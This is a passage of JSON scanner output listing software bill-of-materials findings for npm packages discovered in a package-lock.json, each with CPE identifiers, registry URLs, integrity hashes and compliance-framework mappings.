"syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/hsl-to-rgb-for-reals@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz", "integrity": "sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9e434aef3ca36a26", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: html-entities 2.6.0", "title": "html-entities 2.6.0", "description": "Package discovered: html-entities 2.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4d1e475b46ee4f29", "name": "html-entities", "version": "2.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/html-entities@2.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz", "integrity": "sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "73fec784f0f7a1eb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: html-to-text 9.0.5", "title": "html-to-text 9.0.5", "description": "Package discovered: html-to-text 9.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "41ee91a75a779a86", "name": "html-to-text", "version": "9.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/html-to-text@9.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz", "integrity": "sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg==", "dependencies": { "@selderee/plugin-htmlparser2": "^0.11.0", "deepmerge": "^4.3.1", "dom-serializer": "^2.0.0", "htmlparser2": "^8.0.2", "selderee": "^0.11.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c43d43edb7287d6e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: htmlparser2 8.0.2", "title": "htmlparser2 8.0.2", "description": "Package discovered: htmlparser2 8.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4a5b4c89e570771b", "name": "htmlparser2", "version": "8.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/htmlparser2@8.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz", "integrity": "sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA==", "dependencies": { "domelementtype": "^2.3.0", "domhandler": "^5.0.3", "domutils": "^3.0.1", "entities": "^4.4.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f927a519c85962f3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: http-errors 2.0.1", "title": "http-errors 2.0.1", "description": "Package discovered: http-errors 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bf2c5c4cccddf639", "name": "http-errors", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/http-errors@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz", "integrity": "sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ==", "dependencies": { "depd": "~2.0.0", "inherits": "~2.0.4", "setprototypeof": "~1.2.0", "statuses": "~2.0.2", "toidentifier": "~1.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "af32118f21902d1f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: http-parser-js 0.5.10", "title": "http-parser-js 0.5.10", "description": "Package discovered: http-parser-js 0.5.10", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b85e63dfe0c1efe8", "name": "http-parser-js", "version": "0.5.10", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/http-parser-js@0.5.10", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz", "integrity": "sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2fd1314214cea39c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: http-proxy-agent 5.0.0", "title": "http-proxy-agent 5.0.0", "description": "Package discovered: http-proxy-agent 5.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "91bc09c317f85f97", "name": "http-proxy-agent", "version": "5.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/http-proxy-agent@5.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz", "integrity": "sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==", "dependencies": { "@tootallnate/once": "2", "agent-base": "6", "debug": "4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d375a13b9232535f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: https-proxy-agent 5.0.1", "title": "https-proxy-agent 5.0.1", "description": "Package discovered: https-proxy-agent 5.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ac843d04db23cee1", "name": "https-proxy-agent", "version": "5.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/https-proxy-agent@5.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", "dependencies": { "agent-base": "6", "debug": "4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "56bdc5dcaf0f0066", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: https-proxy-agent 7.0.6", "title": "https-proxy-agent 7.0.6", "description": "Package discovered: https-proxy-agent 7.0.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2d10e944bb8687bf", "name": "https-proxy-agent", "version": "7.0.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/https-proxy-agent@7.0.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", "dependencies": { "agent-base": "^7.1.2", "debug": "4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": 